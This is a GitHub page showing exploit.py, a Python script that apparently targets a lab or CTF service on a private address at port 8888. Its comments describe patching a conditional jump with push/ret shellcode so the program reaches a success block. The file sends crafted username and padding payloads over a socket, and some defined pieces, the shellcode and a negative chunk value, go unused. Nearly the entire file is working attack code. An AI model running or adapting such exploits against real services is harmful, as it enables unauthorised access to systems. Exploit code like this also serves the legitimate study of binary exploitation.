-
Notifications
You must be signed in to change notification settings - Fork 1
/
exploit.py
46 lines (39 loc) · 1.25 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
#/usr/bin/python
import socket
from core.colors import *
IP = '192.168.188.135'
# IP = '192.168.188.131'
PORT = 8888
"""
Logic:
0x08048B53 = address of SUCCESS message block.
Write PUSH 0x08048B53, retn to the address at:
0x08048b51 <+372>: JE 0x8048b5a <main+381>
"""
comparison_addr = 0x08048B51 # 0x08048b51 <+372>: JE 0x8048b5a <main+381>
shellcode = "\x68\x53\x8B\x04\x08" # push 0x8048b53
shellcode += "\xC3" # ret
try:
print(f"{run} Trying to connect to {underline}{IP}{end} at port {underline}{PORT}{end}...")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP, PORT))
print(f"{good} Connection Established!")
except Exception as e:
print(f"{bad} Error in connecting to {underline}{IP}{end} at port {underline}{PORT}{end}... Try Again")
print(e)
exit()
negative_chunk = '0' + '\xff\xff\xff\xfc'
username_prefixes = '0'
def exploit():
msg = 'A'
msg += '\x0a'
msg += username_prefixes + 'root' + '\x00'
msg += '\x41' * 43
msg += username_prefixes + 'root' + '\x00'
msg += '\x41' * 43
msg += username_prefixes + 'toor'
s.send(msg.encode())
data = s.recv(1024).decode()
print("Client Says: " + msg)
print("Server Reply: " + data)
exploit()